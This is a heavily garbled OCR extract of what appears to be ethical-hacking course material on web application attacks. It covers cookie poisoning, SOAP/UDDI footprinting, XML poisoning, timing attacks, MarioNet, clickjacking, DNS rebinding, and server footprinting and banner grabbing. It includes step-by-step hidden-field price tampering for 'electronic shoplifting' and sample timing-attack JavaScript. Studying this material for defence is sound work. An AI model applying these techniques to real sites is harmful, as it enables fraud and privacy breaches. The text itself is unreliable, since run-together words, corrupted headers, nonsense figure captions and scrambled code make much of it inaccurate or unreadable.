everyvisit to thesite. Anyprivateinformation enteredis storedin a cookie. To protectcookies,
site developers often encodethem. Easily reversibleencoding methodssuchas Base64and
ROT13 (rotatingthelettersofthealphabet through 13characters) give a falsesenseofsecurity
to the
users
Threats
who view cookies.
Compromised
cookiesandsessions can provide
assuminganotheruser'sonline identity,
an
attackerto access accounts and assume the identityattacker
with
attackerscan review the original
allowing
user credentials, the
of other users of an application.
By
user'spurchase
history,
ordernew items,exploitservices,andaccessthe vulnerablewebapplication.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Oneof the easiest examples involvesusingthe cookiedirectly for authentication.Another
methodof cookie/session poisoninguses a proxy to rewrite the session data,displaying the
cookie dataand/or specifying
a new user ID or othersessionidentifiers in thecookie.
Thereare
four typesof cookies:persistent,
non-persistent,secure, andnon-secure. Persistentcookiesare
storedon a disk,whereas non-persistentones are storedin memory.Webapplications transfer
secure cookies
How CookiePoisoning
only
through
Works
SSLconnections.
‘GET
/store/buyaspx?checkout=yes
HITP/LO
ceptReferrer:
Host:
WebServer
ae servor
replies
‘Web with
requested
pageand
cookie on the user's browser
‘sets.
Usertrowiesa webpage
tach
SS, GET
phishing
«cookie
/stoe/ouy
foraspx?chechoutoyes
teas
HTTP/LO
comHos:
Acct
(Sniffing
Ftp
ran certitedhachershop */* Refers
certifiedhactershopcom/showprads
px
Cookie:SESSIOND-325896ASDO23SA3S07,BasketSiie-%
Nem>125;Rem2-2658;
Rem3-6652
TotlPrie>100;
Product t o attacker's
is delivered address
16.34:Working ofCookiePoioning
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServiceAttack
12 eserves
are
on
XML
points;universal
"ple objet access
Ferves
based
defniton
language
description,
dscovery, (WSDL)
used deserve
forthe
andconnection
of
seh ¢ we
web
protocols
fo
protocl(SOAP)
an
sured
integration
(UDD)ae
for communion
and
description escover
betweenwebservice, whichre vulnerable various
Services:
WebServiceAttack
Similarto the way i n whicha user interacts with a web application
through
a browser,
a web
service can interact directly
withtheweb application
withouttheneedforan interactive user
sessionor a browser.Theevolutionandincreasing
attackvectorsin an application
framework.
WebServicesDefinition Language
u se of web servicesin
Webservices are basedon XML
(WSDL) for describing
new
suchas businesses
the connection points,Universal
offer
protocols
Description,Discovery, and Integration(UDI) for the description and discoveryof web
andSimple
services, Object AccessProtocol(SOAP) for communication betweenweb services,
whichare vulnerableto various web application
threats.
Theseweb services havedetaileddefinitionsthat allow regular
users and attackersto
of the informationrequired
examples
of
understandthe construction the services. Thus,
to fingerprint
web services provide
the attackerwith much
the environment to formulate an attack.Some
of thistypeof attackare as follows:
1. An attackerinjectsa maliciousscriptinto a web service and can discloseand modify
application
data.
attackerusesa web service for ordering
‘An products and injectsa scriptto reset the
quantityandstatus on the confirmationpageto lessthanwhathe or shehadoriginally
ordered,Thus,the systemprocessing the order requestsubmitsthe order,ships the
order,and then modifiesthe order to showthat the company is shipping a smaller
numberof products, buttheattacker endsup receivingmore ofthe product thanhe or
shepaysfor.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
10.35:
Web
stacks
services
and attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServiceFootprinting
Attack
©
aches
welfootprint
andMods
‘indingempate,
a applieation to getUDOinformation
such a s busines, business Serve,
XML
Query
WebServiceFootprinting
Attack
Attackersuse the UniversalBusiness Registry(UBR)as a major source to gather
information
aboutwebservices,as itis very usefulforbothbusinesses Its apublic
andindividuals. registry
that runs on UDDIspecificationsandSOAP.UBRis somewhatsimilarto a "Whoisserver― in
functionality. web services on a UDI server, businesses
To register generally
or organizations
Useone of the following
structures:
businessEntity:
holdsdetailedinformationaboutthe company,suchas company name
andcontact details.
businessService: a logicalgroup of singleor multipleweb services. Every
businessServicestructure is a subsetof businessEntity.
the technicalanddescriptive information a
EachbusinessService
about a businessEntity
outlines
element'swebservice.
bindingTemplate: a single
represents web service. It is a subsetof businessService
andit
contains technicalinformationthat is required
by a client application
to bind and
interact with a targetweb service.
technicalModel(tModel): takesthe form of keyed
metadataand represents
unique
conceptsor constructsin UDI.
Attackerscan footprint
a web application
to obtain any or all of theseUDDIinformation
structures.
XML
Query
POST /inquire HITP/1.1
Content-Type: text/xml; chase!
SOAPAction
ical andCountermensores
Mackin ©by E-Comel
Copyright
cache-Control: no-cache
Pragma:no-cache
User-Agent: Java/1.4.2_04
Host:
uddimicrosoft.com
//scemas..xn1soap.
‘nttp: org/soap/envelope/">
<Body>
<find_servicegeneric="2.0" xmins="urn:uddi-
org:api_v2"><name>amazon</nane></find_service>
</Body>
</Bnvelop>
HTTP/1.1100 Continue
XML
Response
BYTP/1.1200 OK
Date: Wed,08 Jan 2020 11:05:34 GME
Server: Microsoft-118/7.5
X-Powered-By:
ASP.NET
X-AspNet-Verstion: 1.14322
cache-Control: private, max-age=0
Content-Type: text/xml; charset
Content-Length:1272
"
2><soap:Envelope
org/soap/envelope/">
//scemas.xm1soap.
‘nttp:
//w3.0rg/2008/xn1Schema"><soap
‘ntep: :Body><serviceList
operator="Microsoft
Corporation―
truncated="false" xmlns="urn:uddi-
02g: api_v2"><serviceInfos><eerviceInfo
serviceKey=6adé1201-2b7e-Sabe-c5aa-Scc6ab9de#43"
businessKey="9112358ad-cl2d-
1234-dded-
c8e34e8a0aa6"><name xml:lang="en-us">Amazon
Research
Pane</nane></serviceInfo><ServiceInfo
serviceKey="25638942-2d33-52£3-5896-cl2ca5632abe" businessKey="adeSe?3-abed-
8£52-ca5e~
1253adcefe2a"><nane xnl:lang="en-us">Amazon Web Services
2. 0</name></servicelnfo><serviceInfo
Module4 1789
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
servicekey="adtaSc78-deGf-4562-d45c-aad45d4562ad"businesskey="28ddacd8-déSc~
456a-4562-
xml:
acde456740£5"<name kang="en">Amazon.com
Web
Services</name></serviceInfo><servicernfo
‘ad52a456-4d5£-7dSe-Bdef-cSe6d456ed45"businessKey="45235896-256a-
add55a456£12"><name
xml
:
Lang="en"
>AmazonBookPrice</name></serviceInfo><serviceInfo
servicekey=9acctSad-ASce-4dSc-1234-888cd4562893"
4d22-ed5d-a5Sadc43ad5c"><name
busineseKey="aa45238d-cd55~
xml
:
Lang="en">AnazonBookPrice</nane></serviceInfo></serviceInfos></servicelis
t></soap:Body></
Envelope> soap:
Module4 1790
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
WebServiceXML Poisoning
WebServiceXML Poisoning
XMLpoisoning is similarto an SQlL attack.It hasa higher
injection success rate i n a web service
framework. Attackersinsert maliciousXML codei n SOAPrequests to perform XML node
manipulation or XML schemapoisoningto generate e rrors i n XML parsinglogic and break
execution logic.Attackers c an manipulate
XML externalentityreferences that can lead to
arbitrary
file or TCPconnection openings,whichcan be exploited
for otherweb service attacks.
XML poisoningenablesattackersto perform a DoS attack and compromise confidential
information.Asweb services are invokedusingXML documents, attackerspoisonthe traffic
betweenthe server and browserapplications bycreatingmaliciousXML documentsto alter
parsingmechanisms suchas SAXand DOM, whichweb applications
useon the server.
XML Request
-<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
‘<FirstName>Jason</FiretName>
<LastName>springfield</LastNane>
<Address>apt
20, 3rd Street</Address>
<Bnail>jasontspringfield.com</Bmail>
<PhoneNunber>6325896325</PhoneNunber>
</CustomerRecord>
PoisonedXML Request
-<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustonerNumber>
ical andCountermensores
Mackin ©by E-Comel
Copyright
2010</CustonerNunber>
<PirstName>Jason</PiretName>
<LastName>springfield</LastNane>
<Address>apt
20, 3rd Street</address>
<Bnai>jason@springfield.com</smail>
<PhoneNunber>6325896325</PhoneNunber>
</CustomerRecord>
Module4 1792
Page tical andCountermensores
Making by Comet
Copyright©
Hidden Field Manipulation
Attack
HiddenField Manipulation
Attack
Attackerscarry out hiddenfield manipulation attacksagainst e-commerce websites, as most of
thesesiteshavehiddenfieldsi n theirpriceanddiscount In everyclientsession,
specifications.
developers use hiddenfieldsto store clientinformation, includingproduct pricesanddiscount
rates. Duringthedevelopment ofsuchprograms,developers feelthatall their applications
are
safe;however, hackersc an manipulatethe product pricesandeven complete transactionswith
the alteredprices.Whena user makesselectionso n an HTML page,the selectionis typically
as values
to
stored formfield andsent the application
can also store field valuesas hiddenfields,
as an HTTP
or
request(GETPOST).
which are not renderedon the screen bythe
browserbut collectedandsubmittedas parameters during formsubmissions.
HTML.
Attackerscan
examine the HTML codeof the page and change the hidden field valuesto change post
to
the
requests server,
Example
A particular mobilephone mightbe offeredfor $1000 o n an e-commerce website,
but the
hacker, byaltering some ofthe hiddentext i n its pricefield,purchasesit foronly$10.
Suchattacksresultin severe lossesfor websiteowners, even though theymightbe usingthe
latest anti-virus software,firewalls,
1DS,and so on to protect their networksfrom attacks.
Besides financial the owners can alsolosetheir marketcredibility.
losses, An example
of such
codeis given below:
<form method="post" action="page.aspx">
<input type="hidden" value="200,00">
name="PRICE―
Product name: <input type="text name="product―
value="Certifiedhacker Shirt"><br>
ical andCountermensores
Mackin ©by E-Comel
Copyright
Product price: 200.00"><br>
</form>
1 Open
the htmlpage withinan HTMLeditor.
2 Locatethe hiddenfield(e.g.
"<type=hidden value=200.00>"),
name=price
3 Modify value(e.g.
its content toa different "<type=hidden value=2.00>")
name=price
4 Savethehtmlfile locally
andbrowseit
5 Clickthe Buybuttonto perform
electronicshoplifting
via hiddenmanipulation,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Web-basedTiming
Attacks
(©Aweb-basedtiming
such
a passwords retrieve
web the by sensitiv byatackerst o
attack's a typeofsie-channelattack performed
from applications bymeasring response time taken theserver
information
Crose-ite c
tc, nich tach sendcrafted
request
‘chr
take
advantage ofsidechannel
lek oa
browser
by
the
toetimate he i m e taken Brower
Web-basedTiming Attacks
‘A
sensitive information
taken bythe server. Theseattacksexploit
attackperformed
web-basedtimingattackis a typeof side-channel
suchas passwords
fromwebapplications
side-channel
byattackersto retrieve
bymeasuringtheresponsetime
leakageand estimate the amount of
timetakenfor secret key operations.Differenttypesof web-basedtimingattacksinclude
direct.
timingattacks,
cross-sitetimingattacks,andbrowser-based timingattacks.
DirectTiming
Attack
bymeasuringthe approximate
Direct timingattacksare carriedout time taken bythe
server toprocessa POST through
request, whichattackersc an deducethe existenceof a
attackersperform
username. Similarly, characterbycharacterpassword examination
and exploitthe timinginformationto determinethe positionwhere the password
comparison failed. Then,attackersuse this data to determinethe targetuser's
password.
Timing
Cross-site attack
A cross-site timingattack is another type of timingattack,i n whichattackerssend
craftedrequestpackets to thewebsiteusingJavaScript, unlikea directtimingattack,
wherethe attackerhimself/herself passesthe requestto a website.Theattackerthen
analyzes
by
the timeconsumedthe user to downloadthe requested
Forinstance,considera websitehttp://xyz.com
file.
that containstwo separate groupssuch
as /the-prompt/and/the-anonymous-place/,andonlythe group members haveaccess
to thedatafedinto thesegroups.If anyotherpersontries to accessthe group,an error
messageis generated. Now,whena user accesses a n unknownwebsitethat contains
ical andCountermensores
Mackin ©by E-Comel
Copyright
malicious
JavaScript bytheattacker,
injected the attacker
can findout whichgroupthe
user belongs
to andthusviolatehis/her
privacy.
Sample
JavaScript
(url,attack
function
codeusedto perform
getMeasurement callback) (
this
var a Image():
=
new
a.addEventListener(‘error’,
function() {
var
callback
conclude =
performance.now()
(conclude begin)
-
; ;
yD:
var
a.sre
begin
=
=
url;
performance.now()
;
)
( (
//xyz.com/the-prompt/’,
getMeasurement‘http:
getMeasurement‘http:
function (timeTDs) {
function (
//xyz.com/the-anonymous-place’,
(timeTF)
If (timetF> timerDs) {
)
alert (‘The
prompt is alright!’)
;
else {
alert (‘Privacy
breach!");
)
ve
nD:
Timing
Browser-based Attacks
Browser-based timingattacksare sophisticated side-channelattacks.Ratherthan
depending on the unsteadydownload takeadvantage
time, attackers of side-channel
leaksof a browserto estimate the time takenbythe browserto processthe requested
resources. In thiscase,the time estimation begins
immediately
afterthe download
of a
resource andceasesonce the processing is done.
Attackerscan abusedifferentbrowserfunctionalitiesto launchfurther attackssuchas
videoparsingattack,andcache timingattack.
storage
© Video-parsingAttack
Sample
JavaScript
codeusedto perform
thisattack:
function
var p =
getMeasurement
document
(url, callback) {
.createElement (‘video’)
var begin;
ical andCountermensores
Mackin ©by E-Comel
Copyright
function() (
p.addsventiistener(‘suspend’,
»
begin
=
performance.now()
;
function() {
p.addBventListener(‘error’,
; ;
var conclude performance.now()
=
De
p.sre = url;
)
In contrastto cross-sitetimingattacks, here, the estimation time beginswhenthe
event “suspend―
is triggered. The event is usually triggered when the resource
downloading is stopped, as the requested resource is not an intendedvideo; it is
onlya double-or triple-digit KBfile, Theevent is alsotriggered whenthe resource
downloadis completed. Subsequently, the browserattemptsto parse the requested
video. Certainly,
resource as a the files HTML/JSON/... are invalid video formats;
hence,
the browserwill raise an “error―
event. Here,the attackerobservesthe
amount of time the browser takesto processthe resource and generatea n error
event. Singleestimation for every end pointmight not alwaysserve the purpose.
Therefore,attackerstry to accumulateseveraltime estimations andcalculatethe
medianor average.
CacheStorage Timing Attack
The Cache API interface(used to load,fetch,anddelete any responses) offers
complete cache(memory) to the developers. Loading resources i n the disktakes
some amount oftime based o n the resource size. If attackers can estimate the time
taken bythe browserto perform this task,theycan measure the corresponding
response size.
‘Sample
JavaScriptcodeusedto perform thisattack:
function
fetch
getMeasurement
(url, (mode:“no-cors―,
(url,
callback)
credentials
{
.then
“include―}) (function (resp) (
setTimeout (function() (
caches. open(‘attackerfile’)
var
begin performance.now()
=
. ; then (function (cache)(
(
cache. put (newrequest ‘nyfoo’),
resp.clone()).then(function() {
var conclude
callback = performance.now()
(conclude -
begin);
ical andCountermensores
Mackin ©by E-Comel
Copyright
»
»
}, 2000)
;
)
After estimating
or measuringthe processing time using the abovementionedtechniques,
attackerscan launch further attacks such as brute-forceattacks to obtain complete
information.
ical andCountermensores
Mackin ©by E-Comel
Copyright
MarioNetAttack
or
codeinside
‘malous thebrowser,andthe
Infection perseven afterlosing browsing
whichfection hasspread Inco
tacks register
andactinatea
Service
Worker
ese
pester
the
{When victimbrowses
thatwebsite,
nthe background
Service
=
MarioNet Attack
MarioNet is a browser-based
attackthat runs maliciouscodeinsidethe browser,
and the
infection
persistseven afterclosing
or browsing awayfromthe maliciouswebpagethrough
whichthe infectionhasspread. Most of the latestweb browserssupporta new API called
ServiceWorkersthatallowsthe website
to isolateoperationsthatrender
the webpageUI from
intensive computational
tasksto avoid freezing
of the Ul when largeamounts of data are
processed.
Attackers and activate the ServiceWorkers
register AP!through bythem,
a websitecontrolled
Whenthe victim browsesthat website, the ServiceWorkersAPIautomatically and it
activates,
in the background
can run persistently browsing
even whenthe useris not actively thewebsite.
To keepthe ServiceWorkersAPI alive,attackersabusethe ServiceWorkersSyncManager
interface.
Therefore,
MarioNetcan resist any tab crashesand powerfailures, increasingthe attacker's
potential
to attackthe browser.MarioNetleverages the abilitiesof JavaScript
and depends on
previously
available
HTMLSAPIs.It can beusedto create a botnetandlaunch
othermalicious
attackssuchas cryptojacking, DDoS, clickfraud,
anddistributedpassword cracking.
Furthermore,thisattackallowsattackersto inject maliciouscodeinto high-traffic
websitesfor a
short period,retrieve sensitive information andthen controlthe
suchas user credentials,
abusedbrowsers froma centralserver.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebBrowser
Blocking
Extensions
WebServer
$
Webooee
Sprenderng
Serc
omer
| Oe
comma
RemoteC&C
18.36:tustationofMarioNet
Figure attack
Module4 1800
Page tical MakingandCountermensores
by Comet
Copyright©
Attack
Clickjacking
bytricking
thevictim
any
cing on
malicious
webpageelement
that mec
trusted webpage
‘ny
9 °
attackers
leverage,
Clkacking sng ecige
i s ta
bts tend —
varetyofstack vectorsnd ti
Sy iam or proper
Attack
Clickjacking
AAclickjackingattackis performed whenthe targetwebsiteis loadedinto an iframeelement
that is masked with a webpageelementthat appearslegitimate. Theattackerperforms this
attackbytricking the victim into clickingon any maliciousweb pageelementthat is placed
transparently on the top of any trusted web page. Clickjacking is not a singletechnique;
attackersleverage various attack vectors and techniques called Ul redressattacks.They
perform suchattacksbyexploiting the vulnerabilitiescausedbyHTML iframesor improper
configuration of the X-Frame-Options header.There are severalvariations of clickjacking
attacks and
suchas likejackingcursorjacking.
website
themalicious to the victim through
To perform theseattacks, attackerssenda link to
email,socialmedia,or anyothermedia,
In clickjacking,
the attackerloadsthe targetwebsiteinsidea low opacityiframe.Then, the
attacker designsa pagesuchthat all the clickableitems suchas buttonsare positioned exactly
as on the selectedtargetwebsite,Now, the victim Is tricked into clickingon the invisible
controlsor the deceptive UI elementsthat automatically triggervarious maliciousactions such
as injectingmalware, retrieving maliciousweb pages,retrieving sensitive informationsuchas
creditcarddetails,transferring moneyfromthevictim'saccount,andbuying productsonline,
various clickjacking
‘The techniques
employed byattackers
are listedbelow:
=
Complete overlay:
transparent In this technique,
the transparent,legitimate
pageor
designed
tool page is overlaidon the previously maliciouspage.Then,
it is loadedinto
an invisible
Cropping:
iframeandthehigher
In this technique,
z-index
is for
valueassigned positioning
it on top.
onlythe selectedcontrolsfrom the transparent
pageare
overlaid.Thistechnique
depends on the goalof the attackand may involvemasking
and text labelswith falseinformation,
buttonswith hyperlinks changing the button
ical andCountermensores
Mackin ©by E-Comel
Copyright
and completely
labelswith wrong commands, coveringthe legitimate
page with
misleading
informationwhileexposingonlyone original
button.
Hidden overlay: In this technique, the attacker creates an iframe of 1x1 pixels
containing maliciouscontent placed secretlyunderthe mouse cursor. Whenthe user
clickso n this cursor, it will be registered
on the maliciouspagealthough the malicious
content is concealed bythe cursor.
Clickevent dropping: Thistechnique can completely hide a maliciouspage behinda
legitimatepage.It can alsobeusedto
setthe CSS
none. Thiscan cause clickevents to “drop―
onlythe maliciouspage.
registers
pointer-events
through
property
the legitimate
of the topto
maskedpageand
smolicous
webpageelements
Vitis browser
opensthe target
ik va eral
echiochod
14.37tlstraton of cklacking
Figure attack
Victim'sBrowser
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSRebinding
Attack
*
cokeraete
(niin Pele’
Secu constrains,
2a=~
et
ae
te communicate or
request tloaldomains make
arbitrary
wiod||
ratomuseeaee conan
fermen
twatnibeONSterer
tomeceiedneeream
conaledoytne hen
Theattacker configures
the
fa
septa
eae
lthveryshortTL values
to avoid
—
caching
DNSRebinding
Attack
Attackers use the DNSrebinding techniqueto bypass the same-origin policy'ssecurity
constraints, allowingthemalicious webpageto communicate withor makearbitrary requests
to localdomains.Forinstance, if a clientis working he/she
for an organization, mostly u sesthe
internal or private network.Anyexternalsresources cannotbe accessed insidethat private
networkdue to the same-originpolicy (SOP).Hence, attackerscannot directly
communicate
with the localnetworkdue to restrictions i n the SOP.Therefore, theyuse the DNSrebinding
technique to circumvent thisSOP security implementation,
HowDNSRebinding
Works
‘Anattackercreates a maliciouswebsitewith the domain name certifiedhacker.com and
registers it with the DNSserver controlledbyhim/her.
Now,theattackerconfigures the ONS
server to sendDNSresponseswith very shortTTLvaluesto avoid caching of the responses.
Then,the attackerbegins his/her with the HTTPserver that contains the
intendedoperation
websitehttp://certifiedhacker.com.
malicious
Whenthe victim opens the malicious website,
the attacker'sDNSserver sendsthe IP Addressof
websitehttp://certifiedhacker.com.
the HTTPserver that hoststheattacker-controlled Theweb
server responds with a pagethat runs JavaScript browser.Then,
code i n the victim’s the
JavaScript code accesses the website on the domain http://certfiedhacker.com to get
additionalresources from http://certfiedhacker.com/secret.html.Whenthe browserruns the
JavaScript,it makesa DNSrequest forthedomain(owing to theshortTTLconfiguration), but
the attacker-controlled DNSserver responds with a new IP. For instance, if the attacker-
controlledDNSserver responds withthe privateor internalIP of xyz.com,thevictim'sbrowser
toadshttp://xyz.com/secret.htmlandnot http://certifiedhacker.com/secret.htm!
successfully
by
bypassingthe SOP.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Application
‘Web Concepts Hacking
Methodology
a
Web
Application API,
Webhoo
Threats
Web
———_—_=[[_
:
»-_—
= — f°
Web Application
Hacking
Methodology EH
¢
DEctor we nrastctare LE) managemen
21 session Mechanism
Aly
bypass
We Appitons
Chen SideControls
Perfocm
eck
Injen Atacs
AppatonLogeas
tack Authorization
Schemes ‘attack
Database
Connectivity
Ee
FE) nese
en
serves
SR
Web Application
Hacking
Methodology
Theprevious section discussed
the securitypostureof web applications byanalyzing various
typesof threats/attacks in use. Attackersperform
currently theseattacksusinga detailed
processcalledthe hacking methodology. Thissection will describethe stepsof the hacking
methodology,explaining howattackerstargetwebapplications.
Module4 1805
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Attackers use thewebapplication hacking
methodology
to gainknowledge of a particular
web
application to compromise it successfully.
Thismethodology
allowsthem to planeachstepi n
detailto increasetheirchances ofsuccessfully
hacking
the application.
Underthismethodology,
theydo the following
to collectdetailedinformationabout various resources neededto run or
access thewebapplication
Footprint webinfrastructure
=
Analyze
webapplications
Bypass
=
client-sidecontrols
Attackauthenticationmechanisms
authorization
‘Attack
Attackaccesscontrols
schemes
‘Attack
session managementmechanisms
Performinjectionattacks
‘Attack logic
application flaws
shared
‘Attack environments
Attackdatabaseconnectivity
Attack
Attack
webapplication
web services
clients
If hackersdo not use thisprocessandtryto exploitthewebapplication directly,
theirchances
of failureincreases. Thefollowingphasesof thismodulewill provide
a detailedexplanation
of
howattackers deriveinformation
abouttheseresources.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebInfrastructure
Footprint
©Webifastructure
Wert vulnerable footprinting
we
the fist te i n
webapplications
application i thlps
hacking attackers
to
select veins
]
Web Infrastructure:ServerDiscovery
Footprint CEH
|G Serverdiscovery
evesinformation
aboutserver locations
an
ensures
is the
thatthetarget
server Ive on Internet
Ns
Interrogation
|
NS
§
maropson
pysns tone Toe
s/osh
s on ©ote ot mon
pon
|
scoot
thevener
Penson
Module4 1807
Page ical andCountermensores
Mackin Copyright E-Comel
©
by
WebInfrastructure:ServiceDiscovery
Footprint
the targetwebsever to
Sean that we s e rv e rs use forferent series
WebInfrastructure:ServerIdentification/
Footprint
BannerGrabbing
Module4 1808
Page tical MakingandCountermensores
Copyright©
Comet
by
FootprintWebInfrastructure:
Site
and Proxies on Target Detecting
AppWeb
EH Firewalls
Detecting
Proxies
Detecting WebApplication
Firewalls
‘oteaion
hden
content
fnconaty
nd tt ee OWASP
Zed
Atack Proxy
Web | AWtackerDieected
Spidering
Spidering/Grawing
Module4 1809
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
WebInfrastructure:DetectLoadBalancers CEH
Footprint
Footprint
Web Infrastructure
Footprinting of gathering
is the process complete
information
abouta system
andall its related
components, as well as how they work. Theweb infrastructureof a web application is the
arrangement bywhichit connects to other systems,servers, and so on i n the network.Web
infrastructurefootprintingis the first stepi n web application
hacking;it helps attackersto
selectvictims and identify vulnerable web applications. Attackersfootprint the web
infrastructureto knowhowthe web application connectswith its peersandthe technologies
it
Uses and to find vulnerabilitiesi n specific
partsof the web application architecture.These
vulnerabilities
Footprinting
can
help
attackers
exploit andgainunauthorized
to
a ccess theweb application,
thewebinfrastructureallowsan attackerto engage i n the following tasks:
=
ServerDiscovery:Attackersattemptto discoverthe physical servers that host web
applications,
usingtechniques suchas Whoislookup, DNSinterrogation, portscanning,
andso on,
onports
othersto findservices running open andexploit
ServerIdentification:Attackersuse bannergrabbing
them,
to obtain the server banners,
which helpto identify the makeand version of the web server software,Other
that
LocalIdentity:
the
information this technique providesincludes following:
informationsuchas the locationof the server andthe Origin-Host.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LocalAddresses: that the server uses forsending
the localIP addresses Diameter
Exchange
Capability messages(CER/CEA messages),including
the server identity,
‘capabilities,
andother information
suchas protocol
version number andsupported
Diameter
applications.
Self-Names: thisfield specifies
all the realmsthat the server considersas localand
sentas
no
treats all therequests for them
HiddenContent Discovery:
Footprinting
realmrequests.
alsoallowsattackersto extract content and
functionality
that is not directly
linkedto or reachable
fromthemain visiblecontent.
LoadBalancersDetection: Attackers can detect load balancers of the target
alongwith their real IP addresses
organization to identify
servers exposedover the
Internet,
ServerDiscovery
To footprint first,you need to discoveractive Internet servers. Three
a web infrastructure,
techniques,
namely
Whoislookup, andportscanning,help
DNSinterrogation, i n discovering
the
active servers andtheirassociated
information
=
WhoisLookup
Whoislookup toolsallowyou to gather
informationabout a domainwith the helpof
DNSand Whoisqueries.They provide
informationabout the IP addressof the web
toolsproduce
server and DNSnames. These resultsi n the formof an HTML report.
Usethefollowing
toolsto perform lookup:
Whois
(httpsi//www.netcraft.com)
Netcraft
(http://whois.domaintools.com)
WHOISLookup
(https://www.tamos.com)
SmartWhois
sabsoft.com)
BatchIPConverter (http://www.
DNSInterrogation
Organizations
use DNSinterrogation, whichis a distributeddatabase,to connect their IP
addresses
with their respective
connected,
launching
hostnames andvice versa. Whenthe DNSis improperly
then it is very easyto exploit
an attackon a target
it and gather
It provides
organization.
the informationrequired for
informationaboutthe location
of
type
and servers.
Usethe following
toolsto perform
DNSinterrogation:
© Toolset(https://tools.dnsstuff.com)
Professional
0 (https://network-tools.com)
DNSRecords
0 (https://github.com)
DNSRecon
(https://centralops.net)
DomainDossier
ical andCountermensores
Mackin ©by E-Comel
Copyright
Port Scanning
Port scanningis the processof scanningsystemportsto recognizeopen ones. It
to connect to a particular
attempts set of TCPor to find out the service that
UDP ports
a n unusedopen port,they
existson the server. If attackersrecognize can exploit it to
intrudeinto the system.
Usethefollowing
toolsto perform
portscanning:
(htps://nmop.org)
Nmap
Pro(https://www.netscantools.com)
NetScanTools
‘Advanced (https://www.advanced-port-scanner.com)
Port Scanner
©
(http://www.
Hping hping.ora)
ServiceDiscovery
the webinfrastructureprovides
Footprinting dataaboutthe services offered,
suchas exchange
of data,path
and encryption and protocols
of transmission, deployed. Scanthe target
web
server to identifythe common portsthat it uses for differentservices. Afterfindingthese
services, attackerscan compromise them to exploit the web infrastructurethat runs the
application. services act as attackpaths
The identified forwebapplication hacking.
Thetable
belowlistscommon portsusedbywebservers andtheir respective
HTTPservices:
Port
80
Typical
WorldWideWebstandard
HTTPServices
port
a AlternateW WW
88 Kerberos
RemoteNetwork
ServerSystem
SSL(HTTPS)
RemoteShell
‘Open
Directory (ODProxy)
Proxy
IBMRMC(Remote and Control)
monitoring Protocol
SecureInternetLive Conferencing
(SILC)
NETCONF
for
NETCONF SOAP
over HTTPS.
for SOAP
over BEEP.
IBMWebsphere
administrationclient
RemoteHTTPSmanagementfor firewalldevicesrunning
‘embedded
CheckPointVPN-1software
RemoteWebWorkplace,
Microsoft a featureofWindows
Business
Server
‘Small
ical andCountermensores
Mackin ©by E-Comel
Copyright
1433 MSSQL
Server
134 MSSQL
Monitor
1527 OracleNet Services
2301 ‘Compaq
insight
Manager
2381 ‘Compaq
insight
Manager
over SSL
2638 Anywhere
SQL DatabaseServer
za “Microsoft
Application
CenterRemotemanagement
7001 BEAWebLogic
7002 BEAWebLogic
over SSL
Sun
‘3000Webover
7070
Alternate
Java Server
webserver or
SSL.
webcache
8001 Alternateweb server or management
‘80059090
‘Apache
Tomcat
SunJavaWebServeradminmodule
10000 Netscape
Administratorinterface
deplaying
Table14.1:Table HTPServices
©
Tools
>
used
service
Nmap
for discovery
Source:https://nmap.org
Nmap i s a multi-platform, multi-purpose application usedto perform
footprinting
of
ports,services,operating etc. It is usedfor networkdiscovery
systems, andsecurity
auditing, It is usefulfortaskssuchas networkinventory, managingservice upgrade
schedules,
and
monitoring
host or service uptime.
14.39Screenshot
Figure ofNmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
service discovery
Someadditional toolsare as follows:
Pro(httns://www.netscantools.com)
NetScanTools
SandeatBrowser(http://wwwsyhunt.com)
ServerIdentification/Banner
Grabbing
Bannergrabbing is a footprinting
technique usedbya hacker to obtainsensitive information
about a target.An attackerestablishesa connection with the targetand sendsa pseudo-
request to it. Thetargetthen repliesto the requestwith a bannermessage that contains
sensitive informationrequiredbytheattackerto furtherpenetratethe target.
Through
bannergrabbing, the name and/or
attackersidentify version of a server, operating
or application.
system, They analyze
the server responseheaderfieldto identify the make,
model,
and version of the web server software.Thisinformationhelps
them to selectthe
appropriate
exploitsdatabases
How an attacker
attack server
fromvulnerability to the web andits applications.
can use telnet to establisha connection and gain bannerinformation
of a
is demonstrated
target below:
=
issues
Theattacker thecommand telnet moviescope.com 80 i n his/her
commandpromptto establisha telnet connection withthe targetmachine,
machine's
words,
specify
either ofa
addresstarget
Note: Theattackercan
he/she
ofathe IP
oftenetcommand usage
14.40:Anexample
Figure
Afterestablishing
the connection,the attackerreceives the prompt:doesnot display
any
information
Now,the attackerwill pressthe Esckey,whichreturns thebannermessagethat displays
informationaboutthetargetserver along withsome miscellaneousinformation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Serveridentified
as nginx
helps
This information attackersfind waysto exploittargetweb servers andtheir
applications.
Grabbing
Bannersfrom SSLServices
Toolssuchas TelnetandNetcatare capable of grabbing
banners of web servers over
onlya n HTTPconnection. Attackerscannot grabbannersover an SSLconnection using
the same techniquesas thoseusedforgrabbing bannersover HTTPconnections.They
can use tools suchas OpenSSL to grabbannerson web servers over an encrypted
(HTTPS/SSL)
connection.
Attackersperform
the following
stepsto grab
bannersover an SSL.
connection:
©. Step1:
OpenSSL
Install
Opensst
is a cryptography
toolkit implementing (SSL)
the SecureSocketsLayer and
Transport (TLS)
LayerSecurity network protocols
andthe relatedcryptography
standardsrequired
bythem,
Ieis availableat hetps://Awww.openssl.org
Step2: Navigate
3: inthe
to OpenSSL terminal
ical andCountermensores
Mackin ©by E-Comel
Copyright
14.42:
Figure xampleof OpenSSL
command
1443:Resultof OpenssL.
Figure bannerrabng
bannergrabbing
Someadditional toolsare asfollows:
+
Netcat(http://netcat
